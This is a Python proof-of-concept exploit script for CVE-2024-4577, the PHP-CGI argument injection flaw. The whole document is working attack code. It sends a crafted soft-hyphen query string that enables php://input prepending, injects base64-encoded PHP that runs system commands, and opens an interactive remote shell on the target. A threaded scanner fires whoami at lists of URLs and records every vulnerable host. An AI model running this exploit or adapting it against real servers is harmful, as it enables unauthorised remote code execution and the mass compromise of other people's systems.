CVE-2024-4577.py

#!/usr/bin/env python3

import re
import base64
import requests
import argparse
from rich.console import Console
from urllib3 import disable_warnings
from urllib3.exceptions import InsecureRequestWarning
from alive_progress import alive_bar
from prompt_toolkit import PromptSession
from prompt_toolkit.formatted_text import HTML
from prompt_toolkit.history import InMemoryHistory
from concurrent.futures import ThreadPoolExecutor, as_completed

disable_warnings(InsecureRequestWarning)

console = Console()

def ascii_art():
    print("")
    console.print("[bold bright_yellow] ██████ ██    ██ ███████       ██████   ██████  ██████  ██   ██       ██   ██ ███████ ███████ ███████[/bold bright_yellow]")
    console.print("[bold bright_yellow]██      ██    ██ ██                 ██ ██  ████      ██ ██   ██       ██   ██ ██           ██      ██[/bold bright_yellow]")
    console.print("[bold bright_yellow]██      ██    ██ █████   █████  █████  ██ ██ ██  █████  ███████ █████ ███████ ███████     ██      ██ [/bold bright_yellow]")
    console.print("[bold bright_yellow]██       ██  ██  ██            ██      ████  ██ ██           ██            ██      ██    ██      ██  [/bold bright_yellow]")
    console.print("[bold bright_yellow] ██████   ████   ███████       ███████  ██████  ███████      ██            ██ ███████    ██      ██  [/bold bright_yellow]")
    print("")
    print("Coded By: K3ysTr0K3R")
    print("")

headers = {"Content-Type": "application/x-www-form-urlencoded"}
php_settings = ["-d cgi.force_redirect=0", '-d disable_functions=""', "-d allow_url_include=1", "-d auto_prepend_file=php://input"]
settings_str = " ".join(php_settings).replace("-", "%AD").replace("=", "%3D").replace(" ", "+")
payload = f"/php-cgi/php-cgi.exe?{settings_str}"

def detect_php_cgi_injection(target, command="whoami"):
    try:
        encoded_command = base64.b64encode(f"echo '[S]'; system('{command}'); echo '[E]';".encode()).decode()
        php_payload = f"<?php phpinfo(); echo eval(base64_decode('{encoded_command}')); die()?>"
        payload_path = f"{target.rstrip('/')}{payload}"
        response = requests.post(payload_path, headers=headers, data=php_payload, timeout=5, verify=False)
        output_match = re.search(r"\[S\](.*?)\[E\]", response.text, re.DOTALL)
        if output_match:
            extracted_output = output_match.group(1).strip()
            return extracted_output
        return None
    except requests.exceptions.RequestException:
        return None

def interactive_shell(target: str):
    console.print("[green][+][/green] Interactive shell opened successfully")
    session = PromptSession(history=InMemoryHistory())
    while True:
        cmd = session.prompt(HTML("<ansicyan><b>Shell> </b></ansicyan>"), default="").strip()
        if cmd.lower() == "exit":
            break
        if cmd.lower() == "clear":
            print("\x1b[2J\x1b[H", end="")
            continue
        result = detect_php_cgi_injection(target, cmd)
        if result:
            print(result)
        else:
            console.print("[red][-][/red] Failed to execute command")

def exploit_php_cgi_injection(target, output_file=None):
    console.print("[blue][*][/blue] Checking if the target is vulnerable")
    result = detect_php_cgi_injection(target)
    if result:
        console.print(f"[green][+][/green] The target [bold bright_cyan]{target}[/bold bright_cyan] is vulnerable")
        console.print(f"[green][+][/green] Initial command output: [bold bright_yellow]{result}[/bold bright_yellow]")
        if output_file:
            with open(output_file, "a") as file:
                file.write(f"[+] The target {target} is vulnerable: Initial command output: {result}\n")
        console.print("[blue][*][/blue] Initiating interactive shell")
        interactive_shell(target)
    else:
        console.print(f"[red][-][/red] The target [bold bright_cyan]{target}[/bold bright_cyan] is not vulnerable")

def scanner(target, output_file=None):
    result = detect_php_cgi_injection(target)
    if result:
        console.print(f"[green][+][/green] The target [bold bright_cyan]{target}[/bold bright_cyan] is vulnerable: [bold magenta]Initial command output[/bold magenta]: [bold bright_yellow]{result}[/bold bright_yellow]")
        if output_file:
            with open(output_file, "a") as file:
                file.write(f"[+] The target {target} is vulnerable: Initial command output: {result}\n")

def scan_from_file(target_file, threads, output_file=None):
    try:
        with open(target_file, "r") as url_file:
            urls = [url.strip() for url in url_file]
            if not urls:
                console.print("[red][-][/red] No URLs found in the file.")
                return

        completed_tasks = []
        failed_tasks = []

        def process_url(url):
            try:
                scanner(url, output_file)
                completed_tasks.append(url)
            except Exception:
                failed_tasks.append(url)

        console.print("[blue][*][/blue] Injecting [bold bright_yellow]whoami[/bold bright_yellow] command")
        console.print(f"[blue][*][/blue] Scanning {len(urls)} targets from file: [bold]{target_file}[/bold]")
        print("")

        with alive_bar(len(urls), title="Scanning Targets", bar="smooth", enrich_print=False) as bar:
            with ThreadPoolExecutor(max_workers=threads) as executor:
                futures = [executor.submit(process_url, url) for url in urls]
                for future in as_completed(futures):
                    future.result()
                    bar()

        print("")
        console.print(f"[blue][*][/blue] Scanning completed. Successful: [bold green]{len(completed_tasks)}[/bold green], Failed: [bold red]{len(failed_tasks)}[/bold red]")
    except Exception as e:
        console.print(f"[red][-][/red] An error occurred: {str(e)}")

if __name__ == "__main__":
    ascii_art()
    parser = argparse.ArgumentParser(description="A PoC exploit for CVE-2024-4577 - PHP CGI Argument Injection Remote Code Execution (RCE)")
    parser.add_argument("-u", "--url", type=str, help="Single URL to exploit")
    parser.add_argument("-f", "--file", type=str, help="File containing URLs to scan")
    parser.add_argument("-o", "--output", type=str, help="Store results into a file")
    parser.add_argument("-t", "--threads", type=int, default=5, help="Number of threads for scanning (default: 5)")

    args = parser.parse_args()

    if args.url:
        exploit_php_cgi_injection(args.url, args.output)
    elif args.file:
        scan_from_file(args.file, args.threads, args.output)
    else:
        parser.print_help()